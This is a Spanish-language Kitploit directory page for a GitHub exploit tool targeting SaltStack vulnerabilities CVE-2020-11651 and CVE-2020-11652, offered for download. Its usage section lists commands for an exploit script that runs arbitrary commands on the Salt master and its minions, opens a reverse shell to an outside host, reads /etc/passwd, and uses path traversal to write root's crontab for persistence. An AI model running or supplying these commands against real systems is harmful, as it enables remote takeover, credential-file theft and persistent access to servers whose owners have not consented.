Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-11652 — CVE-2020-11652 & CVE-2020-11651 | Kitploit
Herramientas/GitHubGitHub/al1ex/cve-2020-11652
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónMovimiento LateralPruebas de PenetraciónComando y Control
GitHubal1ex/cve-2020-11652

CVE-2020-11652

CVE-2020-11652 & CVE-2020-11651

Ver Repositorio
63hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

SaltStack-Exp

CVE-2020-11651 CVE-2020-11652

Ejecutar-Maestro:

root@kitploit:~
python exp.py --exec-choose master --exec-cmd "whoami"

Ejecutar-Agentes:

root@kitploit:~
python exp.py --exec-choose minions --exec-cmd "whoami"

ObtenerShell:

root@kitploit:~
python exp.py --shell-LHOST 8.8.8.8 --shell-LPORT 4444

LeerArchivo:

root@kitploit:~
python exp.py --read /etc/passwd

SubirArchivo:

root@kitploit:~
python exp.py --upload-src "/test/root" --upload-dest "../../../../../../../../var/spool/cron/crontabs/root"

De :https://github.com/bravery9/SaltStack-Exp

Descargar herramienta